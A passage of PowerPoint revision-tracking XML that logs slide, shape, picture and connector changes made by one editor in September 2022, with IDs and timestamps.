      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:23:16.827" v="2842" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="847199092" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:15.697" v="2506" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D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7" creationId="{50AED3AE-A3CA-FCFB-0B2F-E642A328FB8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:41.285" v="2509"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:spMk id="8" creationId="{BB0FD171-A33A-D311-E605-B4E7E24AAE4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:23:16.827" v="2842" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:spMk id="9" creationId="{E4799BD2-490A-F6CC-D2FD-336994A6D0D0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0" creationId="{41591102-5F02-C3D6-6E2E-9741AC66E255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4" creationId="{5F60B1EA-774C-5E80-AE60-CF5A86F380EA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5" creationId="{C76C5D15-7EE1-141A-011E-5C8FD6F86B4C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7" creationId="{2B31238C-60C3-384F-8FC3-03CC0C253950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19" creationId="{DE50556C-BF14-DA11-524C-FDC3043DAD03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1" creationId="{04E8958F-D71C-DE10-1ED7-65865098DF2C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3" creationId="{4B1F7F7B-D85E-E22A-19AB-A3474154C539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28" creationId="{26593B1B-0E56-2520-4862-3630A49923B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:34.277" v="2507" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:spMk id="30" creationId="{7F5627DF-8D22-7B3F-8946-EEC1178F6C5E}"/>
          </ac:spMkLst>
        </pc:sp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3" creationId="{26A57681-B464-C011-E3EA-6F3E2D025A56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5" creationId="{26622AA9-236F-3C61-0B68-554958DC15E6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11" creationId="{FDB381F5-0E7B-3154-3528-4A9B1A02AC18}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:34.277" v="2507" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:picMk id="12" creationId="{A3343F79-1D78-33AB-EC5E-DFC83472F9A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod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6" creationId="{F6A0EE37-507F-6230-B80B-B8C294DB5596}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del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13" creationId="{EE41070B-0486-8CD9-258B-40DF49EF044D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:34.277" v="2507" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="847199092" sldId="303"/>
            <ac:cxnSpMk id="16" creationId="{7C0F99DF-9798-02C1-216F-62F644C86D16}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:08:38.058" v="2024"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1941852975" sldId="303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128498135" sldId="303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30392356" sldId="304"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:21:49.970" v="3089" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1738595862" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:19:16.676" v="2875" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738595862" sldId="304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21:49.970" v="3089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678245409" sldId="305"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:28:31.003" v="3210" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3634349355" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:27:34.116" v="3188" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3634349355" sldId="305"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:28:31.003" v="3210" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3634349355" sldId="305"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:36:53.808" v="3504" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="336849706" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:36:53.808" v="3504" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="336849706" sldId="306"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:18:42.905" v="2510" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="862356587" sldId="306"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:36:33.140" v="3464" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2057539986" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:36:33.140" v="3464" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D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298956982" sldId="307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161922861" sldId="308"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:37:00.032" v="3514" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1708406914" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:37:00.032" v="3514" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1708406914" sldId="308"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:39:33.807" v="3667" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1718002156" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:39:33.807" v="3667" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1718002156" sldId="309"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg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2781138118" sldId="309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66007121" sldId="310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3418671525" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-07T10:01:53.481" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1316747116" sldId="312"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd addSection delSection modSection">
      <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T22:37:12.508" v="13164" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst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09857222" sldId="256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513183265" sldId="257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3524271673" sldId="258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404156214" sldId="259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2059108520" sldId="260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659189446" sldId="261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911817486" sldId="262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984346526" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T22:37:12.508" v="13164" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952303437" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:37:35.765" v="49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4T16:19:50.951" v="55" actId="20577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5T22:37:12.508" v="13164" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:spMk id="10" creationId="{E53E09A1-5DCA-1C52-EFE5-B7D59C5050A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:21:10.857" v="114" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:spMk id="11" creationId="{AA872FC9-2308-1F3C-518C-777CCD386F9E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:55:09.757" v="176" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:picMk id="5" creationId="{EEE81E01-F2DF-3D96-3C40-F92A5350988A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:56:01.983" v="187" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:picMk id="7" creationId="{613E5E51-CCB6-9871-0793-587F71CD4BE1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:51:19.779" v="123" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:picMk id="8" creationId="{CDA09AAB-AECE-CDEF-7B44-744D8013E22F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:52:19.026" v="3807" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3215868461" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:47:12.917" v="778" actId="20577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8:52:19.026" v="3807" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:57:45.551" v="192" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:picMk id="3" creationId="{C35BD5E6-D7BE-FDEC-FD49-50159832A6EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:58:24.802" v="199" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:picMk id="7" creationId="{E48FD342-1543-ED34-6C94-FA75ED767978}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-04T16:58:50.742" v="205" actId="29295"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:picMk id="12" creationId="{1B1EB83F-32CC-EFB5-2C15-EB11862F3FAE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T09:34:52.036" v="4408" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1851964172" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T09:34:52.036" v="4408" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851964172" sldId="269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53:22.985" v="3835" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851964172" sldId="269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09:34:46.246" v="4407" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851964172" sldId="269"/>
            <ac:spMk id="8" creationId="{9BCC71D5-8D79-BB76-9D16-BE2236A80F25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:53:26.720" v="3836" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851964172" sldId="269"/>
            <ac:picMk id="6" creationId="{76AAFA0D-3B45-1F2C-C284-75540A5DA68C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T09:06:49.572" v="3857" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851964172" sldId="269"/>
            <ac:picMk id="7" creationId="{CCE6E779-9F80-B9AA-9EAA-EF4D21DFD457}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:29:05.028" v="5350" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="891638217" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:28:01.118" v="375" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="891638217" sldId="27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9:05.028" v="5350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20:09.730" v="4769" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1231576741" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:19:45.916" v="4691" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1231576741" sldId="27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14.622" v="880" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1231576741" sldId="27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1:20:09.730" v="4769" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1231576741" sldId="271"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:12:43.817" v="6950"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2500524910" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:43:07.027" v="5712" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272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17:27.871" v="4576" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272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17:29.418" v="4577" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:spMk id="7" creationId="{7F2BD64E-BDA1-5E45-74D9-5A7FA9FD8B38}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:17:31.307" v="4578" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:picMk id="6" creationId="{76AAFA0D-3B45-1F2C-C284-75540A5DA68C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:18:15.513" v="4632" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:picMk id="9" creationId="{03D16E31-7CC9-2DBA-260A-86C1003AAC6C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:23:57.683" v="4809" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:picMk id="11" creationId="{5BAA7119-CA57-F324-5B29-04C26C382DA0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:24:28.998" v="4812" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:picMk id="13" creationId="{0A0E0539-568F-34A8-57E2-E484DEBE4402}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:46:10.976" v="5713" actId="14826"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2500524910" sldId="272"/>
            <ac:picMk id="15" creationId="{EF9605EA-902A-5E7B-3AD4-25667324A8CC}"/>
          </ac:picMkLst>
        </pc:pic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3472647929" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:49:23.384" v="978" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3472647929" sldId="273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58.603" v="888" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3472647929" sldId="273"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:sp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1597884952" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T09:17:11.200" v="4281" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1597884952" sldId="27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09:32.352" v="6940" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2235906467" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:49:58.669" v="1029" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2235906467" sldId="27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11:20:25.023" v="4773" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2235906467" sldId="275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2:09:32.352" v="6940" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2235906467" sldId="275"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:16:38.699" v="10729" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2848999665" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:28:12.404" v="5297" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1260607813" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:16:28.615" v="2378" actId="20577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8:12.404" v="5297" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277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07:57:19.995" v="1371" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:picMk id="6" creationId="{76AAFA0D-3B45-1F2C-C284-75540A5DA68C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T07:53:45.097" v="1097" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3648896469" sldId="277"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
